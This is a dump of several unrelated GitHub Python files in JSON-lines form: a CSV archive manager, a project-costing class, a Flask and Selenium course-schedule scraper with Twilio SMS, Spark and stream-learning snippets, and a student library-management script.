issubclass(\n value, converter.Converter):\n ct[name] = value\n for fname in sorted(self.archive.extract_filenames()):\n try:\n prefix, recordcsv = fname.split('__')\n except ValueError:\n continue\n if not recordcsv.endswith('.csv'):\n continue\n recordtype = getattr(records, recordcsv[:-4], None)\n if recordtype is None:\n continue\n if not prefix in managers:\n man = self.__class__(self.archive, prefix)\n man.convertertype = ct[recordtype.convertername]\n managers[prefix] = man\n return managers.values()\n\n def _getconverter(self):\n \"\"\"\n Extract the appropriate converter class to convert the files in\n the underlying archive. Raise an error is no converter is\n found (this happens if there are no files following the\n naming conventions).\n \"\"\"\n managers = self._getmanagers()\n if not managers:\n raise NotInArchive(\n 'Could not determine the right manager '\n 'for files %s' % self.archive.extract_filenames())\n elif len(managers) > 1:\n raise MultipleManagerError(\n 'Found %d managers %s, expected 1' %\n (len(managers), managers))\n return managers[0].convertertype\n\n def get_tableset(self):\n \"\"\"\n Return a populated TableSet from the underlying CSV files\n \"\"\"\n tset = record.TableSet(self._getconverter())\n for rectype in tset.convertertype.recordtypes():\n try:\n tset.insert_all(self.read(rectype))\n except NotInArchive:\n # this may happen for optional tables in the tableset\n continue\n return tset\n\n def convert_to_node(self):\n \"\"\"\n Convert the CSV files in the archive with the given prefix\n into a Node object. Raise an error if some files are missing.\n \"\"\"\n return self.get_tableset().to_node()\n\n def convert_to_nrml(self, out_archive=None):\n \"\"\"\n From CSV files with the given prefix to .xml files; if the output\n directory is not specified, use the input archive to store the output.\n \"\"\"\n fnames = []\n for man in self._getmanagers():\n with man:\n outname = man.prefix + '.xml'\n if out_archive is None:\n out = man.archive.open(outname, 'w+')\n else:\n out = out_archive.open(outname, 'w+')\n with out:\n node = man.get_tableset().to_node()\n node_to_nrml(node, out)\n fnames.append(out.name)\n return fnames\n\n def convert_from_nrml(self, fname):\n \"\"\"\n Populate the underlying archive with CSV files extracted from the\n given XML file.\n \"\"\"\n assert fname.endswith('.xml'), fname\n prefix = os.path.basename(fname)[:-4]\n return self.convert_from_node(node_from_nrml(fname)[0], prefix)\n\n def convert_from_node(self, node, prefix=None):\n \"\"\"\n Populate the underlying archive with CSV files extracted from the\n given Node object. If the prefix is not None, instantiate a new\n manager object associated to the same archive and return it.\n \"\"\"\n if prefix is None:\n man = self\n else: # creates a new CSVManager for the given prefix\n man = self.__class__(self.archive, prefix)\n convtype = converter.Converter.from_node(node)\n with man:\n for rec in convtype.node_to_records(node):\n man.write(rec) # automatically opens the needed files\n return man\n\n def read(self, recordtype):\n \"\"\"\n Read the records from the underlying CSV file. Returns an iterator.\n \"\"\"\n reader = self.rt2reader.get(recordtype)\n if reader is None:\n fname = '%s__%s.csv' % (self.prefix, recordtype.__name__)\n self.rt2file[recordtype] = f = self.archive.open(fname, 'r')\n self.rt2reader[recordtype] = reader = csv.reader(f)\n if self.has_header:\n header = reader.next()\n if header != recordtype.fieldnames:\n raise InvalidFile(\n '%s: line 1: got %s as header, expected %s' %\n (fname, header, recordtype.fieldnames))\n for row in reader:\n yield recordtype(*row)\n\n def readtable(self, recordtype):\n \"\"\"\n Generate a Table object from the underlying CSV\n \"\"\"\n return Table(recordtype, list(self.read(recordtype)))\n\n def find_invalid(self, limit=None):\n \"\"\"\n Yield the InvalidRecord exceptions found in the CSV files.\n If limit=1, the search stops at the first exception found.\n\n :param limit:\n\n the maximum number of exceptions to retrieve;\n if None, all the exceptions are retrieved.\n \"\"\"\n it = self._find_invalid()\n if limit is None:\n return list(it) # return all\n return [e for i, e in zip(range(limit), it)]\n\n def _find_invalid(self):\n for man in self._getmanagers():\n for recordtype in man.convertertype.recordtypes():\n fname = '%s__%s.csv' % (man.prefix, recordtype.__name__)\n if fname in self.archive:\n recorditer = man.read(recordtype)\n for invalid in record.find_invalid(recorditer):\n invalid.fname = fname\n yield invalid\n\n def write(self, record):\n \"\"\"\n Write a record on the corresponding CSV file\n \"\"\"\n rt = type(record) # record type\n writer = self.rt2writer.get(rt)\n if writer is None:\n fname = '%s__%s.csv' % (self.prefix, rt.__name__)\n self.rt2file[rt] = f = self.archive.open(fname, 'w')\n self.rt2writer[rt] = writer = csv.writer(f)\n if self.has_header:\n writer.writerow(rt.fieldnames)\n writer.writerow(record)\n\n def __enter__(self):\n \"\"\"Initialize a few dictionaries\"\"\"\n self.rt2reader = {}\n self.rt2writer = {}\n self.rt2file = {}\n self.archive.opened = set()\n return self\n\n def __exit__(self, etype, exc, tb):\n \"\"\"Close the underlying archive\"\"\"\n self.archive.close()\n\n def __str__(self):\n \"\"\"Display the filenames managed by the CSVManager\"\"\"\n return '<%s %s>' % (\n self.__class__.__name__,\n self.archive.extract_filenames(self.prefix))\n","repo_name":"larsbutler/oq-commons","sub_path":"openquake/commonlib/csvmanager.py","file_name":"csvmanager.py","file_ext":"py","file_size_in_byte":14959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6360761406","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nClass Task:\n===========\n\n Creates an instance of the Task class and provides access methods\n to complete the attributes.\n\n\n Class attributes:\n -----------------\n __Debug : Boolean: set for debug print out\n instances: List of instances if the Task class.\n\n \n Instance attributes:\n --------------------\n _Name = Name of task\n _WorkPackage = Instance of WorkPackage task in which this task \n is defined\n _StaffCostByYear = Total cost of staff in £k for this task by FY\n _CGStaffCostByYear = Cost of CG staff in £k for this task by FY\n _TotalStaffCost = Summed total staff cost over duration of project\n (£k)\n _TotalStaffFrac = Summed total FTE over duration of project (£k)\n _TotalCGStaffCost = Summed total CG staff cost over duration of project \n (£k)\n _EquipmentCostByYear = Total cost of equipment in £k for this task by FY\n _TotalEquipCost = Summed total equipment cost over duration of\n project (£k)\n \n Methods:\n --------\n Built-in methods __new__, __repr__ and __str__.\n __init__: Creates instance and prints some parameters if __Debug is \n True.\n __repr__: One liner with call.\n __str__ : Dump of constants.\n\n\n I/o methods:\n createCSV : Creates CSV file containing Task paramters.\n [Classmethod]\n Input: Instance of Pandas dataframe class containing \n parameters\n String -- path to output file (filename)\n\n\n Get/set methods:\n getInstance: Finds instance of class with Task._Name\n Input: _Name -- str -- name of Project to be found\n Return: Instance of class; None if not found or if more than\n one instance\n [Classmethod]\n\n setStaffCostByYear: Set staff cost per year (£k)\n Input: numpy array\n \n setStaffFracByYear: Set staff frac per year (£k)\n Input: numpy array\n \n setCGStaffCostByYear: Set staff cost per year (£k)\n Input: numpy array\n\n setTotalStaffCost: Set total staff cost (£k)\n Sums staff cost per year.\n \n setTotalStaffFrac: Set total staff frac\n Sums staff FTE per year.\n \n setTotalCGStaffCost: Set total CG staff cost (£k)\n Sums CG staff cost per year.\n \n setEquipmentCostByYear: Set quipment cost per year (£k)\n Input: numpy array\n\n setTotalEquipmentCost: Set total equipment cost (£k)\n Sums equipment cost per year.\n\n\n Processing methods:\n createPandasDataframe : Create Pandas data frame containing Task\n parameters.\n [Classmethod]\n Input: None.\n Return: Instance of Pandas class.\n\n clean: Delete incomplete instances of Task\n [classmethod]\n\n doCosting: Complete costing of Task. Sums data from TaskStaff and\n TaskEquipment related to Task and completes Task costing.\n [Classmethod]\n\n \nCreated on Wed 19Jun21. Version history:\n----------------------------------------\n 1.0: 19Jun21: First implementation\n\n@author: kennethlong\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nfrom operator import attrgetter\n\nimport WorkPackage as wp\nimport TaskStaff as TskStf\nimport TaskEquipment as TskEqp\nimport Progress as Prg\n\nclass Task:\n __Debug = False\n instances = []\n\n#-------- \"Built-in methods\":\n def __init__(self, _Name=\"None\", _WPInst=None):\n\n self._Name = _Name\n self._WorkPackage = _WPInst\n\n #.. Defined, but not filled, at init:\n self._StaffFracByYear = None\n self._StaffCostByYear = None\n self._CGStaffCostByYear = None\n self._TotalStaffCost = None\n self._TotalStaffFrac = None\n self._TotalCGStaffCost = None\n self._EquipmentCostByYear = None\n self._TotalEquipmentCost = None\n \n Task.instances.append(self)\n \n def __repr__(self):\n return \"Task(Name)\"\n\n def __str__(self):\n print(\" Task:\", self._Name)\n print(\" ----> WorkPackage:\", self._WorkPackage._Name, \" \\n\")\n print(\" Staff frac by year:\", self._StaffFracByYear)\n print(\" Staff cost by year:\", self._StaffCostByYear)\n print(\" CG staff cost by year:\", self._CGStaffCostByYear)\n print(\" Total staff frac:\", self._TotalStaffFrac)\n print(\" Total staff cost:\", self._TotalStaffCost)\n print(\" Total CG staff cost:\", self._TotalCGStaffCost)\n print(\" Equipment cost by year:\", self._EquipmentCostByYear)\n print(\" Total equipment cost:\", self._TotalEquipmentCost)\n return \" <---- Task complete.\"\n\n \n#-------- I/o methods:\n @classmethod\n def createCSV(cls, _TskDataFrame, _filename):\n _TskDataFrame.to_csv(_filename)\n\n\n#-------- Get/set methods:\n def getName(self):\n return self._Name\n \n @classmethod\n def getInstance(cls, _Name, _WPInst):\n InstList = []\n if Task.__Debug:\n print(\" Task; getInstance: search for Task name, WP name:\", \\\n _Name, _WPInst._Name)\n for inst in cls.instances:\n if Task.__Debug:\n print(\" Task; getInstance: instances:\", \\\n inst._Name, inst._WorkPackage._Name)\n if inst._Name == _Name and \\\n inst._WorkPackage._Name == _WPInst._Name:\n InstList.append(inst)\n Ninst = len(InstList)\n if Ninst == 0:\n RtnInst = None\n if Ninst == 1:\n RtnInst = InstList[0]\n if Ninst >= 2:\n RtnInst = None\n raise DuplicateTaskClassInstance(Ninst, \"instances of \", _Name)\n\n if Task.__Debug:\n print(\" Task; getInstance: number of instances; return instance:\", \\\n Ninst, \"\\n \", RtnInst)\n\n return RtnInst\n\n def getTotalValue(self):\n TV = None\n if self._TotalStaffCost != None and \\\n self._TotalEquipmentCost != None:\n TV = self._TotalStaffCost + self._TotalEquipmentCost\n return TV\n\n def setStaffCostByYear(self, _StaffCostByYear):\n self._StaffCostByYear = _StaffCostByYear\n \n def setStaffFracByYear(self, _StaffFracByYear):\n self._StaffFracByYear = _StaffFracByYear\n \n def setCGStaffCostByYear(self, _CGStaffCostByYear):\n self._CGStaffCostByYear = _CGStaffCostByYear\n\n def setTotalStaffCost(self):\n self._TotalStaffCost = np.sum(self._StaffCostByYear)\n \n def setTotalStaffFrac(self):\n self._TotalStaffFrac = np.sum(self._StaffFracByYear)\n \n def setTotalCGStaffCost(self):\n self._TotalCGStaffCost = np.sum(self._CGStaffCostByYear)\n \n def setEquipmentCostByYear(self, _EquipmentCostByYear):\n self._EquipmentCostByYear = _EquipmentCostByYear\n\n def setTotalEquipmentCost(self):\n self._TotalEquipmentCost = np.sum(self._EquipmentCostByYear)\n \n\n#-------- Processing methods:\n @classmethod\n def createPandasDataframe(cls):\n TaskData = []\n TaskData.append([\"Name\", \\\n \"WorkPackage\", \\\n \"Staff cost by year (£k)\", \\\n \"Total staff cost (£k)\", \\\n \"CG staff cost per year (£k)\", \\\n \"Total CG staff cost (£k)\", \\\n \"Equipment cost by year (£k)\", \\\n \"Total equipment cost (£k)\"])\n for inst in Task.instances:\n TaskData.append([inst._Name, \\\n inst._WorkPackage._Name, \\\n inst._StaffFracByYear, inst._TotalStaffFrac, \\\n inst._StaffCostByYear, inst._TotalStaffCost, \\\n inst._CGStaffCostByYear, inst._TotalCGStaffCost, \\\n inst._EquipmentCostByYear, \\\n inst._TotalEquipmentCost])\n TaskDataframe = pd.DataFrame(TaskData)\n if cls.__Debug:\n print(\" Task; createPandasDataframe: \\n\", TaskDataframe)\n return TaskDataframe\n \n @classmethod\n def clean(cls):\n OldInst = cls.instances\n NewInst = []\n nDel = 0\n for iTsk in OldInst:\n if not isinstance(iTsk._Name, str) or \\\n not isinstance(iTsk._WorkPackage, wp.WorkPackage):\n del iTsk\n nDel += 1\n else:\n NewInst.append(iTsk)\n cls.instances = NewInst\n return nDel\n\n @classmethod\n def clear(cls):\n OldInst = cls.instances\n NewInst = []\n nDel = 0\n for iTsk in OldInst:\n del iTsk\n nDel += 1\n cls.instances = NewInst\n return nDel\n\n @classmethod\n def doCosting(cls):\n for iTsk in cls.instances:\n _StaffFracByYear = np.array([])\n _StaffCostByYear = np.array([])\n _CGStaffCostByYear = np.array([])\n SumInitialised = False\n for iTskStf in TskStf.TaskStaff.instances:\n if iTskStf._Task == iTsk:\n for iYr in range(len(iTskStf._StaffCostByYear)):\n if not SumInitialised:\n _StaffFracByYear = \\\n np.append(_StaffFracByYear, [0.])\n _StaffCostByYear = \\\n np.append(_StaffCostByYear, [0.])\n _CGStaffCostByYear = \\\n np.append(_CGStaffCostByYear, [0.])\n SumInitialised = True\n _StaffFracByYear += iTskStf._StaffFracByYear\n _StaffCostByYear += iTskStf._StaffCostByYear\n if iTskStf._Staff._ProjectOrCG == \"CG\":\n _CGStaffCostByYear += iTskStf._StaffCostByYear\n iTsk._StaffFracByYear = _StaffFracByYear\n iTsk._StaffCostByYear = _StaffCostByYear\n iTsk.setTotalStaffFrac()\n iTsk.setTotalStaffCost()\n iTsk._CGStaffCostByYear = _CGStaffCostByYear\n\n for iTsk in cls.instances:\n _EquipmentCostByYear = np.array([])\n SumInitialised = False\n for iTskEqp in TskEqp.TaskEquipment.instances:\n if iTskEqp._Task == iTsk:\n iEqp = iTskEqp._Equipment\n for iYr in range(len(iEqp._EquipmentCostByYear)):\n if not SumInitialised:\n _EquipmentCostByYear = \\\n np.append(_EquipmentCostByYear, [0.])\n SumInitialised = True\n _EquipmentCostByYear += iEqp._EquipmentCostByYear\n iTsk.setEquipmentCostByYear(_EquipmentCostByYear)\n iTsk.setTotalEquipmentCost()\n\n\n#-------- Exceptions:\nclass DuplicateTaskClassInstance(Exception):\n pass\n","repo_name":"longkr/LhARA-costing-tool","sub_path":"01-Code/Task.py","file_name":"Task.py","file_ext":"py","file_size_in_byte":11253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6587813617","text":"from flask import Flask, redirect, url_for, render_template, request\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.webdriver.chrome.options import Options\nfrom twilio.rest import Client\nimport time\nimport requests\nimport lxml.html as lh\napp = Flask(__name__)\n\n\"\"\"\nUsed the following as a guide:\nhttps://www.techwithtim.net/tutorials/flask/http-methods-get-post/\n\"\"\"\n\n\"\"\"\nCreated By: \n Felix Rabinovich, \n Ethan Lewis, \n Abin Cheryian, \n Erik Adrian Rodriguez,\n Dylan Dunda,\n Ryan Joseph Babala\n\"\"\"\n\n@app.route(\"/\")\ndef home():\n return render_template(\"index.html\")\n\n\n@app.route(\"/course_select\", methods=[\"POST\", \"GET\"])\ndef course_select():\n all_courses = {\"course1\": {}, \"course2\": {}, \"course3\": {}, \"course4\": {}}\n if request.method == \"POST\":\n dept = request.form[\"fdept\"]\n crs1 = request.form[\"fcrs1\"]\n crs2 = request.form[\"fcrs2\"]\n crs3 = request.form[\"fcrs3\"]\n crs4 = request.form[\"fcrs4\"]\n\n courses = crs1+','+crs2+','+crs3+','+crs4\n\n return redirect(\n url_for(\"get_course\", department=dept, courses_input=courses))\n else:\n return render_template(\"index.html\")\n\n\n@app.route(\"/&\")\ndef get_course(department, courses_input):\n course_list = courses_input.split(',')\n print(\"course list = \", course_list)\n all_sections = {}\n print(\"all sections = \", all_sections)\n all_courses = {}\n crn = 0\n for idx, course_number in enumerate(course_list):\n course_results = {\"credits\": \"0\", \"sections\": {}}\n print()\n print()\n print(\"Course number = \", course_number)\n if course_number is None or course_number.isdigit() != True:\n print(\"No course given\")\n else:\n user_agent = \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36\"\n PATH = \"/usr/local/bin/chromedriver\"\n #PATH = \"C:\\Program Files (x86)\\chromedriver.exe\"\n\n chrome_options = Options()\n chrome_options.headless = True\n chrome_options.add_argument(f'user-agent={user_agent}')\n chrome_options.add_argument(\"--window-size=1920,1080\")\n chrome_options.add_argument('--ignore-certificate-errors')\n chrome_options.add_argument('--allow-running-insecure-content')\n chrome_options.add_argument(\"--disable-extensions\")\n chrome_options.add_argument(\"--proxy-server='direct://'\")\n chrome_options.add_argument(\"--proxy-bypass-list=*\")\n chrome_options.add_argument(\"--start-maximized\")\n chrome_options.add_argument('--disable-gpu')\n chrome_options.add_argument('--disable-dev-shm-usage')\n chrome_options.add_argument('--no-sandbox')\n\n driver = webdriver.Chrome(PATH, options = chrome_options)\n #driver = webdriver.Chrome(PATH)\n\n\n # page = requests.get(\"https://prd-xereg.temple.edu/StudentRegistrationSsb/ssb/term/termSelection?mode=courseSearch\")\n driver.get(\"https://prd-xereg.temple.edu/StudentRegistrationSsb/ssb/term/termSelection?mode=courseSearch\")\n # driver.get(\"https://prd-xereg.temple.edu/StudentRegistrationSsb/ssb/courseSearch/courseSearch\")\n time.sleep(3)\n sel = driver.find_element_by_id('s2id_txt_term')\n sel.click()\n\n # sel.select_by_visible_text(\"Spring 2022\")\n time.sleep(2)\n\n select = driver.find_element_by_id(\"s2id_autogen1_search\")\n select.send_keys('2022 Spring')\n time.sleep(1)\n select.click()\n # select.select_by_value('2022 Spring')\n\n time.sleep(1)\n spring = driver.find_element_by_id(\"select2-results-1\")\n spring.click()\n # spring.select_by_visible_text('2022 Spring')\n\n submit = driver.find_element_by_id('term-go')\n submit.click()\n\n time.sleep(1)\n\n subject_before = driver.find_element_by_id(\"s2id_txt_subject\")\n subject_before.click()\n\n subject_after = driver.find_element_by_id(\"s2id_autogen1\")\n subject_after.send_keys(department)\n time.sleep(1)\n subject_after.send_keys(Keys.RETURN)\n\n crnum_from = driver.find_element_by_name(\"txt_course_number_range_From\")\n crnum_from.click()\n crnum_from.send_keys(course_number)\n\n crnum_to = driver.find_element_by_name(\"txt_course_number_range_To\")\n crnum_to.send_keys(course_number)\n\n search = driver.find_element_by_id(\"search-go\")\n search.click()\n\n time.sleep(1)\n view_sections = driver.find_element_by_class_name(\"form-button.search-section-button\")\n view_sections.click()\n\n time.sleep(2)\n table = driver.find_element(By.ID, \"table1\")\n table_body = table.find_element(By.TAG_NAME, \"tbody\")\n rows = table_body.find_elements(By.TAG_NAME, \"tr\")\n\n section_results = {}\n\n # \"//tagname[@Atrribute='Value']\"\n for row in rows: #sections of a course\n print(\"-------\")\n course_results[\"credits\"] = row.find_element(By.XPATH, \"//td[@data-property='creditHours']\").text\n\n #crn = row.find_element(By.XPATH, \"//td[@data-property='courseReferenceNumber']\").get_attribute('innerHTML')\n #print(\"crn = \", crn)\n crn += 1\n meeting_times = []\n\n prof_td = row.find_element(By.XPATH, \"//td[@data-property='instructor']\")\n prof = prof_td.find_element(By.CLASS_NAME, \"email\").get_attribute('innerHTML') # Professor's name\n print(\"Prof = \", prof)\n\n meeting_td = row.find_element(By.XPATH, \"//td[@data-property='meetingTime']\")\n meetings = row.find_elements(By.CLASS_NAME, \"meeting\")\n for meeting in meetings:\n dayParent = meeting.find_element(By.CLASS_NAME, \"ui-pillbox\")\n day = dayParent.find_element(By.CLASS_NAME, \"ui-pillbox-summary\").get_attribute('innerHTML')\n #day = meeting.find_element(By.XPATH, \"//*[contains(@title,'Class on')]//descendant::div[1]\").get_attribute('innerHTML')\n #day = dayPrelim.find_element(By.XPATH, \"//div[@class='ui-pillbox-summary screen-reader']\").text\n print(\"Day = \", day)\n\n time_range = meeting.find_element(By.TAG_NAME, \"span\") # time range is nested spans\n i = 0\n start, end = \"\", \"\"\n print(time_range.text)\n for span in time_range.find_elements(By.TAG_NAME, \"span\"): #loops 4 times\n #print(\"current span = \", span.get_attribute('innerHTML'))\n #print(\"i = \", i)\n if i == 0:\n start += span.text\n start += \":\"\n i += 1\n continue\n\n if i == 1:\n start += span.text\n i += 1\n continue\n\n if i == 2:\n end += span.text\n end += \":\"\n i += 1\n continue\n\n if i == 3:\n end += span.get_attribute('innerHTML')\n i += 1\n continue\n\n if ',' in day: # Multiple days per 1 meeting time of day\n days_split = day.split(\",\")\n for meeting_day in days_split:\n meeting_map = {\"day\": meeting_day, \"start\": start, \"end\": end, \"instructor\": prof}\n meeting_times.append(meeting_map)\n else:\n meeting_map = {\"day\": day, \"start\": start, \"end\": end, \"instructor\": prof}\n meeting_times.append(meeting_map)\n\n section_results[crn] = meeting_times\n print(\"section results = \", section_results)\n course_results[\"sections\"] = section_results\n driver.quit()\n all_courses[course_number] = course_results\n print(\"** All courses: \", all_courses)\n return render_template(\"output.html\", final_results = all_courses)\n\n\ndef twilio():\n TWILIO_SID = 'ACbf02fe253cef5d92aac22aa3bd5b1676'\n TWILIO_TOKEN = ''\n TWILIO_PHONE = '+12156087254'\n\n client = Client(TWILIO_SID, TWILIO_TOKEN)\n\n def sendOneMessage(sendTo):\n client.messages.create(body=\"Hey There ! Your schedule is complete, you can take a look at it on our site !\",\n from_=TWILIO_PHONE, to=sendTo)\n\n sendOneMessage('+12158079223')\n\n print('SMS sent succesfully')\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"CIS3296SoftwareDesignF21/prj-02-thescheduler","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9340,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"5363419846","text":"import pyspark\nfrom datetime import datetime\nimport json\nfrom pyspark.sql import Row,SparkSession\n\n# spark-submit --packages io.delta:delta-core_2.12:0.8.0\n\nspark = pyspark.sql.SparkSession.builder.appName(\"MyApp\") \\\n .config(\"spark.jars.packages\", \"io.delta:delta-core_2.12:0.8.0\") \\\n .config(\"spark.sql.extensions\", \"io.delta.sql.DeltaSparkSessionExtension\") \\\n .config(\"spark.sql.catalog.spark_catalog\", \"org.apache.spark.sql.delta.catalog.DeltaCatalog\") \\\n .getOrCreate()\nspark.sparkContext.setLogLevel(\"ERROR\")\npath = \"/opt/bitnami/spark/datasets/thing_outputs_stream-extract.txt\"\ndf = spark.read.format(\"delta\").option(\"versionAsOf\", 0).load(\"file:///opt/bitnami/spark/datasets/thing_outputs_stream-delta\")\ndf.show()\n\n# create view\ndf.createOrReplaceTempView(\"thing_output_1\")\noutputs = spark.sql(\"SELECT * FROM thing_output_1 limit 100\")\n\n# The results of SQL queries are RDDs and support all the normal RDD operations.\nfor o in outputs.collect():\n print(o)\n\n# We can also use functions instead of SQL queries:\n# df.groupBy(\"age\").count().orderBy(\"age\").show()\n\nspark.stop()","repo_name":"naravitchan/apache-spark","sub_path":"src/delta-code/firehose/get-output.py","file_name":"get-output.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35657745148","text":"\"\"\"Prequential data stream evaluator.\"\"\"\r\n\r\nimport numpy as np\r\n\r\nfrom sklearn.metrics import accuracy_score\r\n\r\nfrom ..metrics import balanced_accuracy_score\r\n\r\n\r\nclass Prequential:\r\n\r\n\r\n def __init__(self, metrics=(accuracy_score, balanced_accuracy_score)):\r\n if isinstance(metrics, (list, tuple)):\r\n self.metrics = metrics\r\n else:\r\n self.metrics = [metrics]\r\n\r\n def process(self, stream, clfs, interval=100):\r\n\r\n # Assign parameters\r\n self.stream_ = stream\r\n self.interval_ = interval\r\n\r\n intervals_per_chunk = int(self.stream_.chunk_size / self.interval_)\r\n self.scores = np.zeros(\r\n (\r\n len(self.clfs),\r\n ((stream.n_chunks - 1) * intervals_per_chunk),\r\n len(self.metrics),\r\n )\r\n )\r\n\r\n i = 0\r\n while True:\r\n stream.get_chunk()\r\n a, _ = stream.current_chunk\r\n # break\r\n\r\n if stream.previous_chunk is not None:\r\n X_p, y_p = stream.previous_chunk\r\n X_c, y_c = stream.current_chunk\r\n\r\n X = np.concatenate((X_p, X_c), axis=0)\r\n y = np.concatenate((y_p, y_c), axis=0)\r\n\r\n for interval_id in range(1, intervals_per_chunk + 1):\r\n start = interval_id * interval\r\n end = start + self.stream_.chunk_size\r\n\r\n for clfid, clf in enumerate(self.clfs):\r\n y_pred = clf.predict(X[start:end])\r\n\r\n self.scores[clfid, i] = [\r\n metric(y[start:end], y_pred) for metric in self.metrics\r\n ]\r\n\r\n [clf.partial_fit(X[start:end], y[start:end])\r\n for clf in self.clfs]\r\n\r\n i += 1\r\n else:\r\n X_train, y_train = stream.current_chunk\r\n [\r\n clf.partial_fit(X_train, y_train, self.stream_.classes_)\r\n for clf in self.clfs\r\n ]\r\n\r\n if stream.is_dry():\r\n break","repo_name":"ibnudaqiqil/CMGMM","sub_path":"models/evaluator/Prequential.py","file_name":"Prequential.py","file_ext":"py","file_size_in_byte":2139,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"72891959161","text":"class marks():\n def __init__(self,a,b):\n self.a=a\n self.b=b\n\n def __add__(self, other):\n x=self.a+other.a\n y=self.b+other.b\n z=marks(x,y)\n return z\n\n\nm1=marks(50,97)\nm2=marks(79,45)\nm3=m1+m2\nprint(m3.a+m3.b)\n","repo_name":"BAMANEBHAGYASHRI/Basic_Python","sub_path":"Oops-Pratice/Polymorphism/OpertorOverrloadingPolymorphism.py","file_name":"OpertorOverrloadingPolymorphism.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19060993851","text":"from django.core.mail import send_mail\n\nfrom .models import Profile\n\n\ndef send():\n users = Profile.objects.prefetch_related('transaction').only('email')\n for user in users:\n statistics = {}\n transactions = user.transaction.filter(user=user.id)\n for transaction in transactions:\n statistics[transaction.id] = [transaction.summa, transaction.action]\n send_mail(\n 'Statistics',\n f'There were {len(transactions)} transactions: {statistics}',\n 'some_mail',\n [user.email]\n )\n","repo_name":"VitaStain/manager","sub_path":"drf/manager/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3344112017","text":"import datetime\nimport glob\nimport os\nimport pandas as pd\n\n\ndef parse_csv(csv):\n filename = os.path.basename(csv)[:-4]\n date = datetime.datetime.strptime(filename, '%Y%m%d').date()\n df = pd.read_csv(csv, sep=',', encoding='utf-8')\n df.drop_duplicates(keep='first', inplace=True)\n df.drop(['gevraagde_faculteit', 'interesses'],\n axis=1, inplace=True, errors='ignore')\n return (date, df)\n\n\ndef merge_dfs(first, second, date):\n merged = first.merge(second, how='outer', indicator=True)\n to_add_index = merged['_merge'] == 'right_only'\n to_remove_index = merged['_merge'] == 'left_only'\n if 'removed' in merged.columns:\n not_yet_removed_index = merged['removed'].isnull()\n to_remove_index = to_remove_index & not_yet_removed_index\n merged.loc[to_add_index, 'added'] = date\n merged.loc[to_remove_index, 'removed'] = date\n merged.drop('_merge', axis=1, inplace=True)\n return merged\n\n\ndef main():\n csvs = glob.glob('data/*.csv')\n dfs = [parse_csv(csv) for csv in csvs]\n\n _, merged = dfs[0]\n for i in range(1, len(dfs)):\n date, df = dfs[i]\n merged = merge_dfs(merged, df, date)\n\n merged.to_csv('merged.csv', index=False, encoding='utf-8')\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"vhsven/kul-buddy-scraper","sub_path":"diffs.py","file_name":"diffs.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26716825310","text":"\n#library management(BETA)\n#created by Sankalp and Darshil\n#resources+modules suite:-\nimport urllib\nimport webbrowser\nimport time\nfrom prettytable import PrettyTable\nmembers=open('member-data.dat','w+')\nmembers1=open('member-activity.dat','w+')\nlibrary=open('library-data.dat','w+')\nbookorder=open('book-order.dat','w+')\nmember1=['darshil','saurav','kashyap','parthiv','brij']\nlibrary1=['harry potter','IDLE GUI','hunger games','divergent']\n#functions suite:-\ndef bookmodif(book1,book2):\n if book1 not in library1:\n print('this book does not exist at the first place.')\n else:\n library1.remove(book1)\n library1.append(book2)\n library.writelines(book2)\ndef passwordcheck(ID, password):\n if ID=='sankalp' and password==1312:\n return True\n elif ID=='darshil' and password==1234:\n return True\n elif ID=='pradeep sir' and password==1729:\n return True\n elif ID=='Kashyap' and password==4209:\n return True\n else:\n return False\ndef membercheck(user1):\n if user1 in member1:\n members1.write(user1)\n else:\n print('you are not a member yet.')\ndef bookindividual(g,g1,g2):\n fileopen1=open(g+',dat','w')\n elements1=('bookname:'+str(g)+'\\n'+'author name:'+str(g1)+'\\n'+'publisher name:'+str(g2)+'\\n')\n fileopen1.writelines(elements1)\n fileopen1.close()\ndef memberindividual(b,bb,bbb):\n fileopen=open(g+'.dat','w')\n elements=('member name:-'+str(b)+'\\n'+'date of enrollment'+str(bb)+'\\n'+'email ID:-'+str(bbb)+'\\n')\n fileopen.writelines(elements)\n fileopen.close()\ndef memberadd(a,aa,aaa):\n bce=('member name:-'+str(a)+'\\n'+'date of enrollment'+str(aa)+'\\n'+'email ID:-'+str(aaa)+'\\n') \n members.writelines(bce)\n member1.append(a)\ndef memberdel(b): \n mem1=open('member-data.dat','r')\n bbb=mem1.readlines()\n mem2=open('member-data.dat','w')\n z5=len(bbb)\n for c5 in range(z5):\n f5=bbb[c5]\n mem2.writelines(f5)\ndef bookissue(c):\n lib1=open('library-data.dat','r')\n read11=lib1.readlines()\n lib3=open('library-data.dat','w')\n z=len(read11)\n for c in range(z):\n f=read11[c]\n lib3.writelines(f)\ndef bookreturn(d):\n lib1=open('library-data.dat','r')\n read12=lib1.readlines()\n lib2=open('library-data.dat','w')\n z1=len(read12)\n for c1 in range(z1):\n f1=read12[c1]\n 